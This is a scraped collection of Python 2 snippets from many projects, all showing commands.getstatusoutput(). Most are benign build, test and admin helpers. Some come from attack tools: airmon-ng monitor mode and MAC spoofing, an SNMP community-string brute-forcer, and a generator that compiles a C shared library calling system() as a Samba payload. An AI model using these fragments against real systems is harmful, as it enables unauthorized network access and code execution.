def execCmd(cmd,
timeOut = -1):
"""
Execute the command given on the UNIX command line and returns a
list with the cmd exit code and the output written on stdout and stderr.
cmd: Command to execute on the shell (string).
timeOut: Timeout waiting for the command. A timeout of "-1" means
that no timeout is applied (float).
Returns: Tuple with the exit code and output on stdout and stderr:
[<exit code>, <stdout>]
"""
logger.debug("Executing command: %s", cmd)
if (timeOut == -1):
return commands.getstatusoutput(cmd)
else:
exitCode, stdout, stderr = ngamsCoreExecCmd(cmd, timeOut)
return [exitCode, stdout]
python类getstatusoutput()的实例源码
def test_cmdline_props(self):
nodebooter, domMgr = self.launchDomainManager()
self.assertNotEqual(domMgr, None)
nodebooter, devMgr = self.launchDeviceManager("/nodes/cmdline_node/DeviceManager.dcd.xml")
self.assertNotEqual(devMgr, None)
status,output = commands.getstatusoutput('ps -ww -f | grep cmdline_dev')
lines = output.split('\n')
for line in lines:
if 'IOR' in line:
break
items = line.split(' ')
self.assertEqual(items.count('testprop'),1)
props=[CF.DataType(id='testprop',value=any.to_any(None))]
retprops = devMgr._get_registeredDevices()[0].query(props)
self.assertEqual('abc',retprops[0].value._v)
def test_nocmdline_props(self):
nodebooter, domMgr = self.launchDomainManager()
self.assertNotEqual(domMgr, None)
nodebooter, devMgr = self.launchDeviceManager("/nodes/nocmdline_node/DeviceManager.dcd.xml")
self.assertNotEqual(devMgr, None)
status,output = commands.getstatusoutput('ps -ww -f | grep cmdline_dev')
lines = output.split('\n')
for line in lines:
if 'IOR' in line:
break
items = line.split(' ')
self.assertEqual(items.count('testprop'),0)
props=[CF.DataType(id='testprop',value=any.to_any(None))]
retprops = devMgr._get_registeredDevices()[0].query(props)
self.assertEqual('abc',retprops[0].value._v)
def __init__(self, attach=True, **opts):
status, gdb = commands.getstatusoutput('which gdb')
if status:
raise RuntimeError, 'gdb cannot be found'
pass_opts = {}
for name, value in opts.iteritems():
if len(name) == 1:
name = '-'+name
pass_opts[name] = value
elif name[0] == '-' and name[1] != '-':
pass_opts[name] = value
elif name[:2] != '--':
name = '--'+name
name = name.replace('_','-')
pass_opts[name] = value
super(GDB,self).__init__(gdb, '=', **pass_opts)
self._attach = attach
def run(self):
# exec command
print (self.command)
# use terminal emulator?
if self.use_term:
commands.getstatusoutput(def_term + " -e 'bash -c \"" + self.command + "; read; \"'")
else:
commands.getstatusoutput(self.command)
# callback
if hasattr(self.callback, '__call__'):
self.callback()
#
# Retarded Kill
#
def slot_monitor(self):
if self.check_options(self.periferica_opt) == 0:
pass
elif self.intf_mode == "Monitor":
status = commands.getstatusoutput('airmon-ng stop ' + self.periferica)
if status[0] != 0:
self.output(status[1], status[0])
else:
self.output("Monitor off: " + self.periferica, status[0])
else:
status = commands.getstatusoutput('airmon-ng check kill && echo y | airmon-ng start ' + self.periferica)
if status[0] != 0:
self.output(status[1], status[0])
else:
self.output("Monitor on: " + self.periferica, status[0])
self.slot_reload_interfaces()
#
# Start Client Fragmentation Attack
#
def slot_mac_change(self):
if self.check_options(self.change_mac_int_opt | self.change_mac_mac_opt | self.mymon_opn | self.intf_mode_opt) == 0:
pass
else:
# backup of old MAC...
commands.getstatusoutput('if [ -e ' + config_dir + '.macaddress-backup ]; then echo ""; else ifconfig ' + self.change_mac_int + ' | grep HWaddr | sed \'s/^.*HWaddr //\' > ' + config_dir + '.macaddress-backup; fi')
status = commands.getstatusoutput('ifconfig ' + self.change_mac_int + ' down hw ether ' + self.change_mac_mac)
if status[0] != 0:
self.output(status[1], status[0])
return
status = commands.getstatusoutput('ifconfig ' + self.change_mac_int + ' up')
if status[0] != 0:
self.output(status[1], status[0])
return
self.output('Mac address of interface ' + self.change_mac_int + ' changed in ' + self.change_mac_mac, status[0])
#
# Enable ip forwarding
#
def run(self):
# exec command
print (self.command)
# use terminal emulator?
if self.use_term:
commands.getstatusoutput(def_term + " -e 'bash -c \"" + self.command + "; read; \"'")
else:
commands.getstatusoutput(self.command)
# callback
if hasattr(self.callback, '__call__'):
self.callback()
#
# Retarded Kill
#
def slot_monitor(self):
if self.check_options(self.periferica_opt) == 0:
pass
elif self.intf_mode == "Monitor":
status = commands.getstatusoutput('airmon-ng stop ' + self.periferica)
if status[0] != 0:
self.output(status[1], status[0])
else:
self.output("Monitor off: " + self.periferica, status[0])
else:
status = commands.getstatusoutput('airmon-ng check kill && echo y | airmon-ng start ' + self.periferica)
if status[0] != 0:
self.output(status[1], status[0])
else:
self.output("Monitor on: " + self.periferica, status[0])
self.slot_reload_interfaces()
#
# Start Client Fragmentation Attack
#
def brute(ip):
print "\n[+] Attempting BruteForce:",ip
try:
for n in names:
response = StringIO.StringIO(commands.getstatusoutput('snmpwalk '+ip+" "+n)[1]).readlines()
if re.search("command not found",response[0].lower()):
print "\n[-] snmpwalk not installed!!!\n"
sys.exit(1)
else:
if verbose ==1:
print "\t{- Trying:",n
if len(response) > 1:
print "\n\tSuccess:",ip,"Community Name:",n
print "\n\tTry: snmpwalk",ip,n,"\n"
except(), msg:
#print "Error:",msg
pass
def log(self,path,number=None):
vList = []
cmd = "cd {path} && svn log -l {number} -q".format(path=path,number=number)
status,result = commands.getstatusoutput(cmd)
if status == 0:
for log in result.split('\n'):
if log.startswith('---'):continue
log = log.split('|')
data = dict()
data['ver'] = log[0].strip()
data['user'] = log[1].strip()
data['comid'] = log[0].strip()
log = log[2].strip().split(' ',2)
ctime = log[0] + ' ' + log[1]
data['desc'] = ctime
vList.append(data)
return vList
def autoSsWap(self):
if self.swap_place:
if config.plugins.ldteam.swapautostart.value:
config.plugins.ldteam.swapautostart.setValue(False)
if fileExists('/etc/init.d/SwapManager'):
if fileExists('/etc/rc3.d/S98SwapManager'):
commands.getstatusoutput('update-rc.d -f SwapManager remove')
commands.getstatusoutput('sh /etc/init.d/SwapManager stop')
config.plugins.ldteam.swapautostart.save()
else:
config.plugins.ldteam.swapautostart.setValue(True)
if fileExists('/etc/init.d/SwapManager'):
if not fileExists('/etc/rc3.d/S98SwapManager'):
commands.getstatusoutput('update-rc.d -f SwapManager defaults 98')
commands.getstatusoutput('sh /etc/init.d/SwapManager start')
config.plugins.ldteam.swapautostart.save()
configfile.save()
else:
mybox = self.session.open(MessageBox, _("You have to create a Swap File before activating autostart"), MessageBox.TYPE_INFO)
mybox.setTitle(_("Info"))
self.updateSwap()
def __transform_xsltproc(self, file, xsl_file, output, params = {}):
command = 'xsltproc '
param_string = ''
keys = params.keys()
for key in keys:
param_string += ' %s "%s"' % (key, params[key])
if param_string:
command += ' --stringparam %s' % param_string
command += ' -o %s %s %s' % (output, xsl_file, file)
# sys.stdout.write('executing command "%s\n"' % command)
(exit_status, out_text) = commands.getstatusoutput(command)
return exit_status, out_text
# os.system(command)
def start(self,netnsName,drive,iprange,port,mode,brName,gateway=None,dns=None):
'''
@param iprange: 172.16.0.100,172.16.0.254
@param mode: int|ext
'''
if drive == 'ovs':
if mode == 'int':
cmd = '''ip netns exec {netnsName} /usr/sbin/dnsmasq -u root -g root --no-hosts --no-resolv --strict-order --bind-interfaces --except-interface lo --interface {port} --dhcp-range={iprange},infinite --dhcp-leasefile=/var/run/dnsmasq/{port}.lease --pid-file=/var/run/dnsmasq-{mode}.pid --dhcp-lease-max=253 --dhcp-no-override --log-queries --log-facility=/var/run/dnsmasq/dnsmasq-{mode}.log --dhcp-option-force=3,6 --conf-file='''.format(iprange=iprange,port=port,netnsName=netnsName,mode=mode)
elif mode == 'ext':
cmd = '''ip netns exec {netnsName} /usr/sbin/dnsmasq -u root -g root --no-hosts --no-resolv --strict-order --bind-interfaces --except-interface lo --interface {port} --dhcp-range={iprange},infinite --dhcp-leasefile=/var/run/dnsmasq/{port}.lease --pid-file=/var/run/dnsmasq-{mode}.pid --dhcp-lease-max=253 --dhcp-no-override --log-queries --log-facility=/var/run/dnsmasq/dnsmasq-{mode}.log --dhcp-option=3,{gateway} --dhcp-option=6,{dns} --conf-file= '''.format(iprange=iprange,port=port,netnsName=netnsName,mode=mode,gateway=gateway,dns=dns)
elif drive == 'brctl':
if mode == 'int':
cmd = '''ip netns exec {netnsName} /usr/sbin/dnsmasq -u root -g root --no-hosts --no-resolv --strict-order --bind-interfaces --except-interface lo --interface {brName}-tap --dhcp-range={iprange},infinite --dhcp-leasefile=/var/run/dnsmasq/{port}.lease --pid-file=/var/run/dnsmasq-{mode}.pid --dhcp-lease-max=253 --dhcp-no-override --log-queries --log-facility=/var/run/dnsmasq/dnsmasq-{mode}.log --dhcp-option-force=3,6 --conf-file='''.format(iprange=iprange,brName=brName,port=port,netnsName=netnsName,mode=mode)
elif mode == 'ext':
cmd = '''ip netns exec {netnsName} /usr/sbin/dnsmasq -u root -g root --no-hosts --no-resolv --strict-order --bind-interfaces --except-interface lo --interface {brName}-tap --dhcp-range={iprange},infinite --dhcp-leasefile=/var/run/dnsmasq/{port}.lease --pid-file=/var/run/dnsmasq-{mode}.pid --dhcp-lease-max=253 --dhcp-no-override --log-queries --log-facility=/var/run/dnsmasq/dnsmasq-{mode}.log --dhcp-option=3,{gateway} --dhcp-option=6,{dns} --conf-file= '''.format(iprange=iprange,brName=brName,port=port,netnsName=netnsName,mode=mode,gateway=gateway,dns=dns)
status,output = commands.getstatusoutput(cmd)
return status,output
def _helper_installer(action):
if action not in ('install', 'uninstall'):
raise Exception('Wrong action: %s' % action)
if IS_LINUX:
cmd = 'bitmask_helpers ' + action
if STANDALONE:
binary_path = os.path.join(here(), "bitmask")
cmd = "%s %s" % (binary_path, cmd)
if os.getuid() != 0:
cmd = 'pkexec ' + cmd
retcode, output = commands.getstatusoutput(cmd)
if retcode != 0:
log.error('Error installing/uninstalling helpers: %s' % output)
log.error('Command was: %s' % cmd)
raise Exception('Could not install/uninstall helpers')
else:
raise Exception('No install mechanism for this platform')
def need_bootstrap():
"""
Check if bootstrap required
:return: True if bootstrap is needed
"""
logger.debug("Check if bootstrap required")
needsBootstrap = False
# Check for avocado
status, output = commands.getstatusoutput('avocado')
if 'command not ' in output:
logger.info("Avocado needs to be installed")
needsBootstrap = True
# Check for avocado-vt
for plugin in ['vt', 'vt-list', 'vt-bootstrap']:
if not is_avocado_plugin_avl(plugin):
logger.info("Avocado %s plugin needs to installed", plugin)
needsBootstrap = True
# Check for avocado-tests
for repo in TEST_REPOS:
repo_name = repo.split('/')[-1].split('.')[0]
if not os.path.isdir(os.path.join(TEST_DIR, repo_name)):
logger.info("Test needs to be downloaded/updated")
needsBootstrap = True
return needsBootstrap
def install_repo(path):
"""
Install the given repo
:param repo: repository path
"""
logger.info("Installing repo: %s", path)
cmd = "cd %s;make requirements;python setup.py install" % path
try:
status, output = commands.getstatusoutput(cmd)
logger.debug("%s", output)
if status != 0:
logger.error("Error while installing: %s\n%s",
path.split('/')[-1], status)
sys.exit(1)
except Exception, error:
logger.error("Failed with exception during installing %s\n%s",
path.split('/')[-1], error)
sys.exit(1)
def install_optional_plugin(plugin):
"""
To install optional avocado plugin
:param plugin: optional plugin name
"""
if not is_avocado_plugin_avl(plugin):
logger.info("Installing optional plugin: %s", plugin)
plugin_path = "%s/avocado/optional_plugins/%s" % (BASE_PATH, plugin)
if os.path.isdir(plugin_path):
cmd = "cd %s;python setup.py install" % plugin_path
status, output = commands.getstatusoutput(cmd)
if status != 0:
logger.error("Error installing optional plugin: %s", plugin)
else:
logger.warning("optional plugin %s is not present in path %s,"
" skipping install", plugin, plugin_path)
else:
# plugin already installed
pass
def codesignapp(app_path):
"""
Get codesign informatiob included in app
About codesign: https://developer.apple.com/legacy/library/technotes/tn2250/_index.html#//apple_ref/doc/uid/DTS40009933
Args:
Mach-o path
Returns:
the content of codesign
"""
cmd = "/usr/bin/codesign -dvvv %s" % app_path
out = commands.getstatusoutput(cmd)
if out and len(out) == 2 and out[0] == 0:
out = out[1]
else:
out = ''
return out
def create_daisy_server_image(self):
LI('Begin to create Daisy Server image')
script = path_join(CREATE_QCOW2_PATH, 'daisy-img-modify.sh')
sub_script = path_join(CREATE_QCOW2_PATH, 'centos-img-modify.sh')
cmd = '{script} -c {sub_script} -a {address} -g {gateway} -s {disk_size}'.format(
script=script,
sub_script=sub_script,
address=self.daisy_server_info['address'],
gateway=self.daisy_server_info['gateway'],
disk_size=self.daisy_server_info['disk_size'])
LI('Command is: ')
LI(' %s' % cmd)
# status, output = commands.getstatusoutput(cmd)
status = run_shell(cmd)
if status:
err_exit('Failed to create Daisy Server image')
if os.access(self.daisy_server_info['image'], os.R_OK):
os.remove(self.daisy_server_info['image'])
image = path_join(self.work_dir, 'daisy/centos7.qcow2')
shutil.move(image, self.daisy_server_info['image'])
LI('Daisy Server image is created %s' % self.daisy_server_info['image'])
def cmd(self, cmd, force=False, no_work=False):
if self.work_tree and no_work == False:
cmd = re.sub(r"^git ", "git --work-tree="+self.work_tree+" --git-dir="+os.path.join(self.work_tree, ".git")+" ", cmd.strip())
if self._enable_echo:
Echo.echo("#[hello git #] "+cmd)
if not force and not os.path.exists(os.path.join(self.work_tree, ".git")):
(status, output) = (1, "Not a git repository: !["+self.work_tree+"]")
else:
(status, output) = commands.getstatusoutput(cmd)
if self._enable_echo:
self._enable_echo = False
Echo.echo("#[hello git -> " + output.replace("\n", "\nhello git -> ")+"]")
if status != 0:
exit(status)
return (status, output)
def generate_payload(file_name, cmd):
content = '''
# include <stdio.h>
# include <stdlib.h>
int samba_init_module()
{
system("%s");
return 0;
}''' % cmd
payload = open(file_name + ".c", 'wb')
payload.write(content.strip())
payload.close()
compile_cmd = "gcc %s.c -shared -fPIC -o %s.so" % (file_name, file_name)
(status, output) = commands.getstatusoutput(compile_cmd)
if status == 0:
print "[*] Generate payload succeed: %s.so" % (os.path.dirname(os.path.realpath(__file__)) + '/' + file_name)
return file_name
else:
print "[!] Generate payload failed!"
exit()
def init_dst_node(self, task_id, label):
if not os.path.isdir(task_id):
os.mkdir(task_id)
os.chdir(task_id)
self.task_id = task_id
'''parse the label info.'''
label_array = label.split('-')
container_name = label_array[0]
base_image = label_array[1]
image_id = label_array[2]
logging.debug('The docker image id is %s' %image_id)
logging.debug(label_array)
'''create new docker container.'''
rmv_sh = 'docker rm -f ' + container_name +' >/dev/null 2>&1'
logging.debug(rmv_sh)
os.system(rmv_sh)
cre_sh = 'docker create --name=' + container_name + ' ' + base_image
logging.debug(cre_sh)
ret,con_id = commands.getstatusoutput(cre_sh)
self.container_id = con_id
#----untar the last dump directory.----#
def __init__(self):
"""
Determines whether pkg-config exists on this machine.
"""
if sys.platform == 'win32':
self.has_pkgconfig = False
else:
try:
self.pkg_config = os.environ['PKG_CONFIG']
except KeyError:
self.pkg_config = 'pkg-config'
self.set_pkgconfig_path()
status, output = getstatusoutput(self.pkg_config + " --help")
self.has_pkgconfig = (status == 0)
if not self.has_pkgconfig:
print("IMPORTANT WARNING:")
print(
" pkg-config is not installed.\n"
" matplotlib may not be able to find some of its dependencies")
def check(self):
if sys.platform == 'win32':
check_include_file(get_include_dirs(), 'ft2build.h', 'freetype')
return 'Using unknown version found on system.'
status, output = getstatusoutput("freetype-config --ftversion")
if status == 0:
version = output
else:
version = None
# Early versions of freetype grep badly inside freetype-config,
# so catch those cases. (tested with 2.5.3).
if version is None or 'No such file or directory\ngrep:' in version:
version = self.version_from_header()
# pkg_config returns the libtool version rather than the
# freetype version so we need to explicitly pass the version
# to _check_for_pkg_config
return self._check_for_pkg_config(
'freetype2', 'ft2build.h',
min_version='2.3', version=version)
def check(self):
if sys.platform == 'win32':
check_include_file(get_include_dirs(), 'png.h', 'png')
return 'Using unknown version found on system.'
status, output = getstatusoutput("libpng-config --version")
if status == 0:
version = output
else:
version = None
try:
return self._check_for_pkg_config(
'libpng', 'png.h',
min_version='1.2', version=version)
except CheckFailed as e:
if has_include_file(get_include_dirs(), 'png.h'):
return str(e) + ' Using unknown version found on system.'
raise
def tearDown(self):
scatest.CorbaTestCase.tearDown(self)
killChildProcesses(os.getpid())
(status,output) = commands.getstatusoutput('chmod 755 '+os.getcwd()+'/sdr/cache/.BasicTestDevice_node')
(status,output) = commands.getstatusoutput('rm -rf devmgr_runtest.props')
def test_NoWriteCache(self):
cachedir = os.getcwd()+'/sdr/cache/.BasicTestDevice_node'
(status,output) = commands.getstatusoutput('mkdir -p '+cachedir)
(status,output) = commands.getstatusoutput('chmod 000 '+cachedir)
self.assertFalse(os.access(cachedir, os.R_OK|os.W_OK|os.X_OK), 'Current user can still access directory')
devmgr_nb, devMgr = self.launchDeviceManager("/nodes/test_BasicTestDevice_node/DeviceManager.dcd.xml")
self.assertEquals(255, devmgr_nb.returncode)
self.assertEquals(devMgr, None)
def test_DeviceConnections(self):
status,output = commands.getstatusoutput('../base/framework/python/ossie/apps/py2prf app_input/py_prf_check_base.py')
self.assertEquals(status, 0)
prf = parsers.PRFParser.parseString(output)
self.assertNotEquals(prf,None)
self.assertEquals(len(prf.get_simple()),1)
self.assertEquals(prf.get_simple()[0].get_id(),'some_simple')
self.assertEquals(len(prf.get_simplesequence()),1)
self.assertEquals(prf.get_simplesequence()[0].get_id(),'some_sequence')
self.assertEquals(len(prf.get_struct()),1)
self.assertEquals(prf.get_struct()[0].get_id(),'some_struct')
self.assertEquals(len(prf.get_structsequence()),1)
self.assertEquals(prf.get_structsequence()[0].get_id(),'some_struct_seq')
def _xmllint(self, fPath, fType):
os.environ['SGML_CATALOG_FILES'] = os.path.abspath("../xml/dtd/catalog.xml")
docType = "-//JTRS//DTD SCA V2.2.2 %s//EN" % (fType.upper())
cmd = "xmllint --nowarning --nonet --catalogs --noout --dropdtd --dtdvalidfpi '%s' %s" % (docType, fPath)
status = commands.getstatusoutput(cmd)
if status[0] != 0:
print status[1]
return status[0]